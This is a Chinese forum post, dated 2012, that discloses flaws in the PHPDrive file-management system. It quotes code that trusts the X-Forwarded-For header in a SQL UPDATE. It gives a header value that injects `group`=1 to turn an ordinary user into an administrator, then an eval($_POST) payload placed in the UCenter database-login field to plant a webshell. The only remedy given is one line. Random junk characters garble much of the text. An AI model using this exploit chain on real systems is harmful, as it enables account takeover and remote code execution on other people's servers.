PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等& v7 O6 R- O2 H' \8 Z1 _: j
3 I! ~0 l& T* Y' }% l$ m
includes/user.lib.php2 @, i: G4 i+ Z/ F* {, d3 v
行87 H' o0 r4 A/ `1 o
function get_ip() {
4 T; n' Z! t; F, g/ A) d( j if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.8 b! e! u7 X3 Z5 p" Q4 o
在用户注册与登录 处module/disk/account.lead.php9 J( [7 k& d8 K( {
198行
$ D6 T1 U0 O4 u! p+ H; n4 F //更新本次登录IP和时间
5 ], n( {& _" r8 r $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生' U1 G' R! x; _. a3 d- X
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
( \/ K+ B. f% ^; `实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
( l) ]- K8 ?2 f8 O后台getshell:# W2 [8 I9 r! x9 V1 o8 d8 g1 d) Y6 j
在UCenter设置处,将UC数据库登录名填写为* P* E7 Z% w2 Y- J1 e# _7 j2 g
# M" f& C% V' M! |
root’);eval($_POST[DisKill]);?>/*
# T. A/ u4 e/ T" F: z- J) k% |) Z4 M可以得到一个shell,位置在 data/uc.data.php
; z0 ?) Q# z, r" Y2 s" O+ ]& \) B4 c
, ]" c+ Q; G" f& O! F- s& V修复:过滤注入1 B9 N* D ^' t! B/ U
6 |$ D: T$ m i5 Y
|
发表于 2012-12-31 09:18:34
收藏
支持
反对